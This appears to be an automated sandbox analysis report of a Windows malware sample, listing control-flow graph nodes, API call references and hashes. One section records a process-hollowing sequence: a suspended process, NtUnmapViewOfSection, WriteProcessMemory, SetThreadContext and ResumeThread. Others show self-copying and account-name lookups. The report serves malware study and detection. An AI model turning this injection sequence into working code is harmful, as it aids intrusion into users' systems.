                              control_flow_graph 393 1390a55-1390a6a GetEnvironmentStringsW 394 1390a6c-1390a8d call 1390a1e call 1390971 393->394 395 1390ac5 393->395 394->395 403 1390a8f-1390a90 call 138db3c 394->403 397 1390ac7-1390ac9 395->397 399 1390acb-1390acc FreeEnvironmentStringsW 397->399 400 1390ad2-1390ad8 397->400 399->400 405 1390a95-1390a9a 403->405 406 1390aba 405->406 407 1390a9c-1390ab2 call 1390971 405->407 409 1390abc-1390ac3 call 138d653 406->409 407->406 412 1390ab4-1390ab8 407->412 409->397 412->409
                              APIs
                              • GetEnvironmentStringsW.KERNEL32 ref: 01390A5E
                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 01390ACC
                                • Part of subcall function 01390971: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,01394B40,?,00000000,00000000), ref: 01390A13
                                • Part of subcall function 0138DB3C: RtlAllocateHeap.NTDLL(00000000,?,?,?,01388272,?,?,?,?,?,013720C3,?,?), ref: 0138DB6E
                              • _free.LIBCMT ref: 01390ABD
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
                              • String ID:
                              • API String ID: 2560199156-0
                              • Opcode ID: c61401ed9bdf904e3164428daf0bdc2895d1597449bc2015f689c3373a8a7aa9
                              • Instruction ID: f941d96698cf9c0d212c6409efe80dfd86b2da1ac52f7c50dd4bf450a474b842
                              • Opcode Fuzzy Hash: c61401ed9bdf904e3164428daf0bdc2895d1597449bc2015f689c3373a8a7aa9
                              • Instruction Fuzzy Hash: 6801AC636013567FFB2565BF1C88C7F6D6DCED2A5C3050229B904D2244F9598D4182F0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 422 1379d04-1379d13 423 1379d15-1379d23 422->423 424 1379d29-1379d5b call 1387684 422->424 423->424 425 137a181 call 138bcdc 423->425 431 1379d5d-1379d6c 424->431 432 1379d8c-1379e02 call 1385ac0 call 1372ce0 call 13862f0 call 1385f70 424->432 430 137a186 425->430 433 137a18b-137a1b8 call 13859a0 * 2 CopyFileA call 1375120 430->433 434 137a186 call 138bcdc 430->434 437 1379d82-1379d89 call 1387684 431->437 438 1379d6e-1379d7c 431->438 457 1379e04-1379e13 432->457 458 1379e33-1379e5b 432->458 452 137a1ba-137a206 call 1385a80 call 1385ac0 call 1385a80 call 1373b10 433->452 453 137a209-137a20b call 138aa9f 433->453 434->433 437->432 438->425 438->437 452->453 459 137a210-137a215 call 138bcdc 453->459 462 1379e15-1379e23 457->462 463 1379e29-1379e30 call 1387684 457->463 465 1379e5d-1379e6c 458->465 466 1379e8c-1379edf GetModuleFileNameA 458->466 462->430 462->463 463->458 471 1379e82-1379e89 call 1387684 465->471 472 1379e6e-1379e7c 465->472 468 1379ee0-1379ee5 466->468 468->468 475 1379ee7-1379f38 call 1385e20 468->475 471->466 472->430 472->471 483 1379f94-1379fb4 call 138ab6c 475->483 484 1379f3a-1379f3d 475->484 493 1379fb6-1379fd9 call 138abfa call 138ae87 483->493 494 1379fdc-137a000 call 138ab6c 483->494 486 1379f51-1379f54 484->486 487 1379f3f 484->487 490 1379f56-1379f5a 486->490 491 1379f8a 486->491 489 1379f40-1379f44 487->489 489->490 495 1379f46-1379f4f 489->495 496 1379f83-1379f88 490->496 497 1379f5c-1379f5f 490->497 492 1379f8c-1379f8e 491->492 492->483 499 137a083-137a08c 492->499 493->494 508 137a002-137a00b call 138abfa 494->508 509 137a010-137a06d GetFileAttributesA CreateDirectoryA GetFileAttributesA 494->509 495->486 495->489 496->492 497->491 501 1379f61-1379f67 497->501 504 137a0bf-137a0e3 499->504 505 137a08e-137a099 499->505 501->496 502 1379f69-1379f6c 501->502 502->491 507 1379f6e-1379f74 502->507 512 137a0e5-137a0f0 504->512 513 137a110-137a134 504->513 510 137a0af-137a0bc call 1387684 505->510 511 137a09b-137a0a9 505->511 507->496 515 1379f76-1379f79 507->515 508->453 508->499 535 137a077-137a07d 509->535 536 137a06f-137a071 509->536 510->504 511->459 511->510 519 137a106-137a10d call 1387684 512->519 520 137a0f2-137a100 512->520 521 137a136-137a145 513->521 522 137a165-137a180 call 1387012 513->522 515->491 524 1379f7b-1379f81 515->524 519->513 520->459 520->519 530 137a147-137a155 521->530 531 137a15b-137a162 call 1387684 521->531 524->491 524->496 530->459 530->531 531->522 535->499 536->433 536->535
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 01379EB5
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0137A1A5
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CopyModuleName
                              • String ID:
                              • API String ID: 4108865673-0
                              • Opcode ID: b42e2eaebda618fcbbf11ecf0a8496cb2fee4c3110b56b94719c1104576b7146
                              • Instruction ID: 250a328350134b8285e76d80998b9654e36fc76014aba6b294b810e1ae116aa9
                              • Opcode Fuzzy Hash: b42e2eaebda618fcbbf11ecf0a8496cb2fee4c3110b56b94719c1104576b7146
                              • Instruction Fuzzy Hash: 73C12CB1A002148BEB34EB2CCC8479DBB35AF5132CF5846DCD64967282DB399EC98F55
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 538 138c25d-138c264 539 138c269-138c270 call 13906b4 call 1390a55 538->539 540 138c266-138c268 538->540 544 138c275-138c279 539->544 545 138c27b-138c27e 544->545 546 138c280-138c289 call 138c2b0 544->546 548 138c2a4-138c2af call 138d653 545->548 551 138c28b-138c28e 546->551 552 138c290-138c297 546->552 554 138c29c-138c2a3 call 138d653 551->554 552->554 554->548
                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free
                              • String ID:
                              • API String ID: 269201875-0
                              • Opcode ID: 4a708cc1ded50a5bad9150429f57d6405822f2fcce6bb54e2b752a6ce76cbba1
                              • Instruction ID: 8496d6ad52c1c5097b765291bb721c6fa6eecc305b9f497b9d91e4d5e4ef0a99
                              • Opcode Fuzzy Hash: 4a708cc1ded50a5bad9150429f57d6405822f2fcce6bb54e2b752a6ce76cbba1
                              • Instruction Fuzzy Hash: F2E0ED22605B1355EF22BBBEBC007AE3798AB9173CF215326E42CD60C0DF30444186B5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 557 1385e20-1385e3c 558 1385e3e-1385e43 557->558 559 1385e64-1385e6a 557->559 560 1385e45 558->560 561 1385e47-1385e61 call 1389bb0 558->561 562 1385f4e call 13869f0 559->562 563 1385e70-1385e7b 559->563 560->561 571 1385f53-1385f58 call 1372150 562->571 566 1385e7d-1385e82 563->566 567 1385e84-1385e91 563->567 572 1385ea2-1385eb6 566->572 568 1385e9a-1385e9f 567->568 569 1385e93-1385e98 567->569 568->572 569->572 573 1385eb8-1385ebd 572->573 574 1385edd-1385edf 572->574 573->571 576 1385ec3-1385ed0 call 1387403 573->576 577 1385eec 574->577 578 1385ee1-1385ee2 call 1387403 574->578 586 1385f49 call 138bcdc 576->586 587 1385ed2-1385edb 576->587 582 1385eee-1385f11 call 138a270 577->582 584 1385ee7-1385eea 578->584 589 1385f3c-1385f46 582->589 590 1385f13-1385f1e 582->590 584->582 586->562 587->582 592 1385f20-1385f2e 590->592 593 1385f32-1385f39 call 1387684 590->593 592->586 594 1385f30 592->594 593->589 594->593
                              APIs
                              • Concurrency::cancel_current_task.LIBCPMT ref: 01385F53
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: Concurrency::cancel_current_task
                              • String ID:
                              • API String ID: 118556049-0
                              • Opcode ID: 99a60c00e11d80a0fe42efdd695636690d312d340402f51b068320ab2a9b3208
                              • Instruction ID: 4cb49971dcf52dab468dba16dceb1578000956697cfaaf598f60407d0390baa0
                              • Opcode Fuzzy Hash: 99a60c00e11d80a0fe42efdd695636690d312d340402f51b068320ab2a9b3208
                              • Instruction Fuzzy Hash: 643124716003008BD728AF7C9C809AEBBE9EF54229B24437EE969C73C0D630A9448792
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • ___std_exception_copy.LIBVCRUNTIME ref: 0137218E
                                • Part of subcall function 01388483: RaiseException.KERNEL32(E06D7363,00000001,00000003,0137216C,?,?,?,0137216C,?,013A6D1C), ref: 013884E3
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExceptionRaise___std_exception_copy
                              • String ID:
                              • API String ID: 3109751735-0
                              • Opcode ID: eb0ca54a799589e6a33caa0f86fd29300c67cd313c01299e877b4340fee389ad
                              • Instruction ID: 8bb708818de7cb465246bacacf4797866c2a351b0e724a3b3419a439bc7be754
                              • Opcode Fuzzy Hash: eb0ca54a799589e6a33caa0f86fd29300c67cd313c01299e877b4340fee389ad
                              • Instruction Fuzzy Hash: 0D01C4B580030E77CB24FFADE80199ABBACDE1421CB508565EA14A7640FB70EA5486D1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 619 138d4b1-138d4d7 call 138d287 622 138d4d9-138d4eb call 139268f 619->622 623 138d530-138d533 619->623 625 138d4f0-138d4f5 622->625 625->623 626 138d4f7-138d52f 625->626
                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: __wsopen_s
                              • String ID:
                              • API String ID: 3347428461-0
                              • Opcode ID: 0958307a48997fd180f2e7d5e6ccdfb797042205d09136ba0bace4946d8ea47f
                              • Instruction ID: 7c62f0550912d3b0e874f8de048829544f5cca0a4ff0e37e67bf786d8689c48a
                              • Opcode Fuzzy Hash: 0958307a48997fd180f2e7d5e6ccdfb797042205d09136ba0bace4946d8ea47f
                              • Instruction Fuzzy Hash: 7C111871A0420AAFCF09DF98E940E9B7BF4EF48318F054059F809AB251E670EA11CBA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 627 138ed56-138ed63 call 138f925 629 138ed68-138ed73 627->629 630 138ed79-138ed81 629->630 631 138ed75-138ed77 629->631 632 138edc4-138edd0 call 138d653 630->632 633 138ed83-138ed87 630->633 631->632 634 138ed89-138edbe call 138e503 633->634 639 138edc0-138edc3 634->639 639->632
                              APIs
                                • Part of subcall function 0138F925: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0138E0E6,00000001,00000364,00000006,000000FF,?,?,01388272,?), ref: 0138F966
                              • _free.LIBCMT ref: 0138EDC5
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeap_free
                              • String ID:
                              • API String ID: 614378929-0
                              • Opcode ID: bbfaf170cd2aa4a5dd4654b786cba334a1d7a93fa1ef5963fa5f0812df2330b2
                              • Instruction ID: dfff93e0ff6cb1c94df0278a7b8c12be25bbfd337be1711a83cd8a40fb32600e
                              • Opcode Fuzzy Hash: bbfaf170cd2aa4a5dd4654b786cba334a1d7a93fa1ef5963fa5f0812df2330b2
                              • Instruction Fuzzy Hash: 55014972604357AFC321AFADD88499EFB98EB053B4F01062AE555A76C0E770A808C7A4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 640 1392621-1392655 call 138add0 call 138ad30 645 139265c-1392671 call 13926af 640->645 646 1392657-139265a 640->646 649 1392676-1392679 645->649 647 139267b-139267f 646->647 650 139268a-139268e 647->650 651 1392681-1392689 call 138d653 647->651 649->647 651->650
                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free
                              • String ID:
                              • API String ID: 269201875-0
                              • Opcode ID: 6d7cabbe3305cb9b6d011bf0e9d56addc9b4860a8407226052aa3c61f76cc774
                              • Instruction ID: 99523f8e05a1d58635c7bc372b17f244ccf4e1197661577980a9975265756baf
                              • Opcode Fuzzy Hash: 6d7cabbe3305cb9b6d011bf0e9d56addc9b4860a8407226052aa3c61f76cc774
                              • Instruction Fuzzy Hash: 44012C72C0025ABFDF01AFAC8C00AEE7FB5AB18228F144166A914E2190E6718A60DBD1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 654 138f925-138f930 655 138f93e-138f944 654->655 656 138f932-138f93c 654->656 658 138f95d-138f96e RtlAllocateHeap 655->658 659 138f946-138f947 655->659 656->655 657 138f972-138f97d call 138b7f0 656->657 663 138f97f-138f981 657->663 660 138f949-138f950 call 138ccd1 658->660 661 138f970 658->661 659->658 660->657 667 138f952-138f95b call 138bd47 660->667 661->663 667->657 667->658
                              APIs
                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0138E0E6,00000001,00000364,00000006,000000FF,?,?,01388272,?), ref: 0138F966
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: 72fa8b7f12e2dbe090249aec11da08b9f18237bf539cd219dddd6be5c1206480
                              • Instruction ID: d5152858028e88e6b05961754290a907432f7740fe7df8f65ba8f1f2c5814337
                              • Opcode Fuzzy Hash: 72fa8b7f12e2dbe090249aec11da08b9f18237bf539cd219dddd6be5c1206480
                              • Instruction Fuzzy Hash: 49F0543165572AB6EB227F2E9804B5B7B9DAF517B8B048111E914AA284CA20D90186F0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,01388272,?,?,?,?,?,013720C3,?,?), ref: 0138DB6E
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: d5822ccaee3648de794946bb4d03c939b60e0483f23d8c8abf50dbcb83fa11f6
                              • Instruction ID: 0709744a7b6d62c97bf80e66059768d0767f5b4562c023c76e3444a90487e2e9
                              • Opcode Fuzzy Hash: d5822ccaee3648de794946bb4d03c939b60e0483f23d8c8abf50dbcb83fa11f6
                              • Instruction Fuzzy Hash: B7E06D3154032667EA333BEE9C00B9A7A9CAF512F9F050124ED199B3C4CB20D80082E5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateFileW.KERNELBASE(00000000,00000000,?,01392758,?,?,00000000,?,01392758,00000000,0000000C), ref: 01392385
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: 5fcc48cd469ca1f0a7508cd550d2dcee5292cab19853481d11b4bb42438764bd
                              • Instruction ID: 0371c0da6bc3468e2e89a45912b118d2617ded978819c20af1a58c028df752d3
                              • Opcode Fuzzy Hash: 5fcc48cd469ca1f0a7508cd550d2dcee5292cab19853481d11b4bb42438764bd
                              • Instruction Fuzzy Hash: 8FD06C3200010DBBDF128E84ED46EDA3FAAFB48714F014010FA1856020C732E821AB95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 013738E6
                              • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0137394B
                              • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 01373964
                              • GetThreadContext.KERNEL32(?,00000000), ref: 0137397F
                              • ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 013739A3
                              • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 013739BE
                              • GetProcAddress.KERNEL32(00000000), ref: 013739C5
                              • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 013739ED
                              • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 01373A0E
                              • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000), ref: 01373A5A
                              • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000), ref: 01373A96
                              • SetThreadContext.KERNEL32(?,00000000,?,?,00000000), ref: 01373AB2
                              • ResumeThread.KERNEL32(?,?,?,00000000), ref: 01373ABE
                              • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000), ref: 01373ACC
                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 01373AED
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
                              • String ID: $NtUnmapViewOfSection$ntdll.dll
                              • API String ID: 4033543172-1522589568
                              • Opcode ID: e743ac4eb2ee4941448e4af91bc42c70755e84bee498641bba589fc245c2acde
                              • Instruction ID: 73e543b119f4f19168cfe9ef55f0a3d8520af61079001a970629edd054564668
                              • Opcode Fuzzy Hash: e743ac4eb2ee4941448e4af91bc42c70755e84bee498641bba589fc245c2acde
                              • Instruction Fuzzy Hash: BA514B71A40218AFEB31DF55DC4ABEAB778FF08705F5000A5F609AA280D7B6A994CF54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateMutexW.KERNEL32(00000000,00000000,?,013A918C,B7E58ED7,?,00000000,00000000), ref: 01377F61
                              • GetLastError.KERNEL32(?,00000000,00000000), ref: 01377F67
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateErrorLastMutex
                              • String ID:
                              • API String ID: 1925916568-0
                              • Opcode ID: 26b25bbb317ac3e138b46949560fbff5923d66f3574a48b3e5a80ff8898347dc
                              • Instruction ID: 08069598f398f4989a678a67ff742fe5bb757c9a9d5246b26aed49e6b0e9403f
                              • Opcode Fuzzy Hash: 26b25bbb317ac3e138b46949560fbff5923d66f3574a48b3e5a80ff8898347dc
                              • Instruction Fuzzy Hash: 71224771A102089BEB28DF6CCC88B9DBB76EF5431CF6441ACE505A73D4DB399A84CB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$InformationTimeZone
                              • String ID:
                              • API String ID: 597776487-0
                              • Opcode ID: d8ea8f5c4626dbb477ea22e1f88c6e45113e77243d29996582440bdb3fd2c2dc
                              • Instruction ID: cd364fa8f35543dc8494a3d9d9b0f633d990def29cd733146c8308cf0e1215ee
                              • Opcode Fuzzy Hash: d8ea8f5c4626dbb477ea22e1f88c6e45113e77243d29996582440bdb3fd2c2dc
                              • Instruction Fuzzy Hash: CEC167B2A04206AFDF21AF7CC850AAABFBDFF1131CF1400A9D4859B281E7309E05CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 01387B12
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: FeaturePresentProcessor
                              • String ID:
                              • API String ID: 2325560087-0
                              • Opcode ID: 889df2582c3d6794dba42330f97adec3d7960d53cc9508832666aaebb42453ae
                              • Instruction ID: 819df2573c070ac40fdfc3c29f354432221bc91b8dd2da82d138b4bc642533f0
                              • Opcode Fuzzy Hash: 889df2582c3d6794dba42330f97adec3d7960d53cc9508832666aaebb42453ae
                              • Instruction Fuzzy Hash: 8E516CB1A00315CFEF25CF69D8957AABBF6FB48318F24896AD506EB344D3749900CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetUserNameW.ADVAPI32(00000000,?), ref: 01373132
                              • GetProcessHeap.KERNEL32(00000008,?), ref: 01373147
                              • HeapAlloc.KERNEL32(00000000), ref: 0137314A
                              • GetUserNameW.ADVAPI32(00000000,?), ref: 01373158
                              • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 0137317B
                              • GetProcessHeap.KERNEL32(00000008,?), ref: 01373186
                              • HeapAlloc.KERNEL32(00000000), ref: 01373189
                              • GetProcessHeap.KERNEL32(00000008,?), ref: 01373199
                              • HeapAlloc.KERNEL32(00000000), ref: 0137319C
                              • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 013731C6
